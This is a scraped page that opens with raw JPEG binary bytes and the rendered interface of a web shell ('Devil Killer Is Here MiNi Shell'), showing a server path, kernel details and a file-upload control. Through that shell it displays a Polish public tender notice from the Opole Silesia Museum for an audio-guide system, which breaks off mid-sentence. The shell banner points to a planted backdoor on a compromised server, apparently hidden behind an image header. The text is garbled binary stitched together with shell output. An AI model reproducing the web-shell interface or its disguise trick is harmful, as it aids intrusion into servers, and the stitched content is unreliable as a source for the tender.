JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240708/0040051901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i wdrożenie systemu audioprzewodników <br/>wraz z oprogramowaniem i osprzętem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM ŚLĄSKA OPOLSKIEGO</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Muzeum Śląska Opolskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000277049</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. św. Wojciecha 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-023</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@muzeum.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://muzeum.opole.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i wdrożenie systemu audioprzewodników <br/>wraz z oprogramowaniem i osprzętem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8d641343-1326-4b1a-a1ee-1c775d6fadec</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00400519</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00209629/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup audioprzewodników wraz z akcesoriami i przygotowaniem nagrań dźwiękowych do wystaw stałych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8d641343-1326-4b1a-a1ee-1c775d6fadec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Komunikacja pomiędzy Zamawiającym a Wykonawcami odbywać się będzie wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344, tj.) przy użyciu Portalu e-Zamówienia, który dostępny jest pod adresem https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.	Zamawiający nie przewiduje innego sposobu komunikacji z Wykonawcą poza środkami komunikacji elektronicznej.<br/>3.	Wymagania techniczne i organizacyjne wysyłania, składania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń zostały szczegółowo opisane w Regulaminie korzystania z systemu e-Zamówienia.<br/>4.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dostępnych na portalu e-Zamówienia formularzy wynosi 150 MB.<br/>5.	Wiadomości przekazywane drogą elektroniczną muszą w sposób jednoznaczny wskazywać nr postępowania (np. w tytule lub oznaczeniu w dokumencie) oraz dane identyfikujące wykonawcę.<br/>6.	Formaty plików muszą być zgodne z krajowymi Ramami Interoperacyjności, o których mowa w Rozporządzeniu Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz.U. z 2024 r. poz. 773). Zamawiający nie dopuszcza przesyłania plików w następujących formatach:<br/>1)	- .com <br/>2)	- .exe<br/>3)	- .bat<br/>4)	- .msi.<br/>7.	Za datę złożenia dokumentów w postępowaniu, a w tym oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów albo oświadczeń przyjmuje się datę ich wysłania poprzez portal e-Zamówienia. <br/>8.	Osobą do kontaktu i porozumiewania się z wykonawcami jest:<br/>1)	w sprawach dotyczących przedmiotu zamówienia:<br/>Joanna Ojdana j.ojdana@muzeum.opole.pl <br/>1)	w sprawach dotyczących procedury przetargowej:<br/>Agata Kekin a.kekin@wp.pl <br/>15.	Zamawiający nie przewiduje:<br/>1)	wizji lokalnej,<br/>2)	zebrania wykonawców,<br/>3)	negocjacji warunków ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2.2024.AK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Budowa nowego systemu opartego na audioprzewodnikach umożliwiających odwiedzającym samodzielne, tj. bez udziału przewodnika, zwiedzanie wystaw stałych w głównym gmachu wystawowym Zamawiającego. Przedmiot zamówienia obejmuje zakup, dostawę i wdrożenie systemu audioprzewodników wraz z oprogramowaniem (opracowaniem scenariuszy ścieżek, tłumaczeń, nagrań, udźwiękowienia, wgranie treści i konfigurację systemu) oraz odpowiednim osprzętem. <br/> <br/>2.	System audioprzewodników:<br/>1)	System audioprzewodników ma być przeznaczony dla wszystkich zwiedzających i oparty na mobilnych urządzeniach udostępnianych fizycznie zwiedzającym oraz infrastrukturze zapewniającej ich prawidłowe działanie (w tym nadajniki, ładowarki, słuchawki itp.). <br/>2)	Zestaw dla każdego zwiedzającego ma składać się z odbiornika, dołączonych do niego słuchawek oraz smyczy. <br/>3)	Odbiornik ma umożliwiać prostą obsługę, poprzez ograniczenie interakcji do wybrania rodzaju ścieżki dźwiękowej (przy rozpoczynaniu zwiedzania) oraz regulację głośności. <br/>4)	Odbiornik musi posiadać wyświetlacz, na którym będą prezentowane omawiane eksponaty oraz wskazówki nawigacyjne, a także umożliwiać tłumaczenie w PJM (Polski Język Migowy). <br/>5)	Infrastruktura systemu ma działać w sposób umożliwiający „obszarowe” uruchamianie nagrań, tj. w momencie gdy użytkownik będzie w odpowiednim miejscu w budynku muzeum (salach, przejściach, korytarzach, wybranych częściach ekspozycji itd.). <br/>6)	W miejscach, gdzie zostanie zastosowane włączanie automatyczne, wielkość obszaru w którym powinno zostać odtworzone nagranie ma być regulowana w zakresie od kilku do kilkunastu metrów tak by dać możliwość aktywacji nagrania na wymaganym obszarze. <br/>7)	Nadajniki, dzięki którym nastąpi włączenie nagrań w audioprzewodnikach winny dawać możliwość ukrycia ich w ekspozycji tak, żeby nie były bezpośrednio widoczne dla zwiedzających i żeby nie wymagały oddzielnej instalacji elektrycznej elektrycznej (konieczne wykorzystanie istniejących instalacji, np. szynoprzewodów lub zasilanie bateryjne).<br/>8)	Audioprzewodniki muszą zapewniać prawidłowe działanie również w przypadku ich umieszczenia w odzieży (np. po włożeniu przez użytkownika do kieszeni)<br/>9)	Oprócz działania automatycznego oferowane rozwiązanie ma zapewniać możliwość ręcznego uruchomienia przez zwiedzającego kolejnych opisów na wystawie.<br/>10)	Oferowany system audioprzewodnika musi zapewniać możliwość sygnalizacji wyniesienia audioprzewodnika poza budynek (monitorowanie wejścia głównego) np. przypadkowo lub z zamiarem kradzieży<br/><br/>3.	Ścieżki dźwiękowe:<br/>1)	Przedmiotem opracowania ma być podstawowa ścieżka lektorska w języku polskim, angielskim, niemieckim, PJM oraz z audiodeskrypcją. Grupą docelową dla wskazanych ścieżek są przede wszystkim osoby dorosłe i młodzież powyżej 13go roku życia. Dodatkowo należy wykonać ścieżkę przeznaczoną dla rodzin z dziećmi, fabularyzowaną w formie słuchowiska.<br/>2)	Wykonawca przygotuje oraz zaimplementuje do audioprzewodników scenariusze ścieżek zwiedzania w postaci nagrania dźwiękowego, video i zdjęć, które będą opracowane w oparciu o wizję lokalną, materiały własne oraz materiały udostępnione przez Zamawiającego, z uwzględnieniem konsultacji merytorycznych z Zamawiającym. .<br/>3)	Tłumaczenia ścieżek na język angielski oraz niemiecki powinny zostać wykonane przez native speaker’a, będącego doświadczonym tłumaczem, a treści tekstowe zawarte w audioprzewodnikach poddane profesjonalnej redakcji i korekcie. Tekst tłumaczenia oraz jego adjustację Wykonawca udostępni Zamawiającemu przed uruchomieniem całego systemu.<br/>4)	Teksty ścieżek mają być opracowane dla potrzeb osób niedosłyszących i głuchych przez surdopedagoga, który przygotuje je do tłumaczenia na PJM do nagrań video, teksty powinny zostać skonsultowane ze środowiskiem odbiorców.<br/>5)	Wykonawca dokona nagrań w profesjonalnym studio nagraniowym z udziałem zawodowych lektorów. <br/>6)	Wykonawca, po opracowaniu scenariuszy ścieżek w języku polskim, przedstawi je Zamawiającemu do akceptacji. Po zaakceptowaniu przez Zamawiającego Wykonawca zrealizuje tłumaczenie i nagrania w językach obcych, oraz przedstawi jej Zamawiającemu do akceptacji. Dodatkowo Wykonawca przedstawi próbny fragment nagrania każdej ścieżki przed rozpoczęciem pracy nad nagraniem całości, w celu uzyskania akceptacji Zamawiającego. Lektor czytający skrypty audiodeskrypcji musi posiadać odpowiednie doświadczenie w czytaniu ścieżek audiodeskrypcji na potrzeby ekspozycji muzealnej:<br/>a)	Wykonawca musi wykazać, że lektor czytający skrypty posiada doświadczenie przy realizacji minimum 2 usług polegających na czytaniu skryptów, opracowań lub scenariuszy w zakresie niniejszego zamówienia.<br/>7)	Przed przystąpieniem do prac Wykonawca zobowiązany jest do przedstawienia Zamawiającemu do akceptacji harmonogramu produkcji ścieżek oraz ich instalacji na ekspozycji.<br/>8)	W przypadku zastrzeżeń odnośnie treści, tłumaczeń czy nagrań Zamawiający zastrzega sobie możliwość odmowy ich przyjęcia. W terminie do 10 dni kalendarzowych od odmowy Wykonawca zobowiązany jest do przedstawienia nowej tj. odpowiednio poprawionej albo ponownie wykonanej wersji ścieżki dźwiękowej lub scenariusza zwiedzania. <br/>9)	Do pół roku po wdrożeniu systemu, na wniosek Zamawiającego Wykonawca zobowiązuje się do wprowadzenia potrzebnych korekty nagrań (np. dla poprawienia nawigacji lub treści ścieżek).<br/><br/>4.	Rodzaje ścieżek audio:<br/>1)	Ścieżka podstawowa – w języku polskim, przeznaczona dla osób dorosłych i młodzieży powyżej 13. roku życia., które nie są specjalistami z dziedzin związanych bezpośrednio z ekspozycją. <br/>2)	Ścieżka rodzinna – w języku polskim, przeznaczona dla rodzin z dziećmi poniżej 13. roku życia. Powinna przedstawiać treści poprzez zabawę, mieć lekką tj. łatwo przyswajalną formę, fabularyzowaną formę słuchowiska. Kolejne nagrania musi łączyć osoba narratora, opowieść musi być prowadzona z jednej perspektywy. Ścieżka powinna mieć tło muzyczne i być uatrakcyjniona dodatkowymi odgłosami współgrającymi z fabułą opowieści.<br/>3)	Ścieżka obcojęzyczna - w języku angielskim i języku niemieckim. Ścieżka ma mieć podobny charakter, jak ścieżka podstawowa, ale ma być dostosowana terminologicznie do zagranicznego odbiorcy. W razie konieczności tekst powinien być uproszczony. <br/>4)	Ścieżka PJM - w Polskim Języku Migowym. Ścieżka ma udostępniać treści do samodzielnego zwiedzania wystawy, w sferze merytorycznej powinna w sposób dostosowany do odbiorcy niesłyszącego / niedosłyszącego przekazywać informacje o wystawie .<br/>5)	Audiodeskrypcja - dedykowana osobom niewidomym i niedowidzącym. Ścieżka ta ma umożliwiać osobom z niepełnosprawnością wzroku efektywne zwiedzania wystawy. Ma udostępniać wszystkie treści wizualne za pomocą werbalnego, dźwiękowego opisu i w taki sposób umożliwić samodzielne zwiedzanie wystawy poprzez przekaz nawigacji (opis przestrzeni) w trakcie zwiedzania<br/>. <br/>5.	Wykonawca jest zobowiązany do spełnienia warunków dotyczących zatrudniania osób na umowę o pracę przy wykonywaniu przedmiotu zamówienia określonych szczegółowo w umowie i szczegółowym opisie przedmiotu zamówienia, o którym mowa w punkcie 6.<br/>6.	Zamawiający nie określa kluczowych części zamówienia, które mają być wykonane przez Wykonawcę bez udziału podmiotów trzecich (podwykonawcy). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32583000-3 - Nośniki danych i głosu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni i porówna jedynie te oferty, które:<br/>1)	zostaną złożone przez Wykonawców nie podlegających wykluczeniu,<br/>2)	nie zostaną odrzucone przez Zamawiającego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ust. 2 o udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1.	zdolności do występowania w obrocie gospodarczym:<br/>1)	Zamawiający nie określa szczególnych wymogów w zakresie tego warunku.<br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>1)	Zamawiający nie określa szczególnych wymogów w zakresie tego warunku.<br/>3.	sytuacji ekonomicznej lub finansowej:<br/>1)	Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, obejmujące swym zakresem szkody powstałe w związku z wykonywaniem czynności (działań, usług) objętych przedmiotem zamówienia, na kwotę ubezpieczenia nie niższą niż 200.000,00 zł (słownie: dwieście tysięcy 00/100 złotych).<br/>4.	zdolności technicznej lub zawodowej:<br/>1)	Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonywał co najmniej dwie dostawy audioprzewodników wraz z osprzętem i oprogramowaniem lub kompleksowo przygotował i opracował scenariusze (samodzielnie bądź na podstawie materiałów zamawiającego) lub opracował nagrania do audioprzewodników, o wartości nie mniejszej niż 200 000,00zł brutto każda (słownie: dwieście tysięcy złotych brutto).<br/><br/>Uwaga<br/>W przypadku wskazania przez Wykonawcę, w celu wykazania spełniania warunków udziału w postępowaniu, wartości wyrażonych w walucie innej niż polska (PLN), w celu jej przeliczenia Zamawiający zastosuje średni kurs NBP wymiany danej waluty na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych na portalu internetowym Urzędu Zamówień Publicznych.<br/>2)	Wykonawca musi wykazać, dysponowanie (dysponuje lub będzie dysponował) co najmniej następującymi osobami zdolną\ymi do wykonania zamówienia, tj.: <br/>a)	Minimum 1 osobą, które będdzie pełniła funkcię lektora czytającego skrypty. Osoba lektora musi posiadać doświadczenie przy realizacji minimum 2 usług polegających na czytaniu skryptów, opracowań lub scenariuszy w zakresie niniejszego zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne do Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego w zakresie art. 109 ust. 1 pkt.1;<br/>2)	oświadczenie, że wykonawca nie zalega z opłacaniem podatków i opłat do Urzędu Skarbowego w zakresie art. 109 ust. 1 pkt 1:<br/>3)	oświadczenie w zakresie art. 109 ust.1 pkt. 8,9,10 <br/>4)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie ust. 1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego w rozdziale XI pkt 3 niniejszej SWZ;<br/>2)	wykaz dostaw wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których dostawy te zostały wykonane, z załączeniem dowodów określających czy te dostawy zostały wykonane należycie, w szczególności informacji o tym czy zostały wykonane zgodnie z przepisami prawa i prawidłowo ukończone – załącznik nr 4.<br/>3)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich uprawnień, kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 5</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Istotne dla 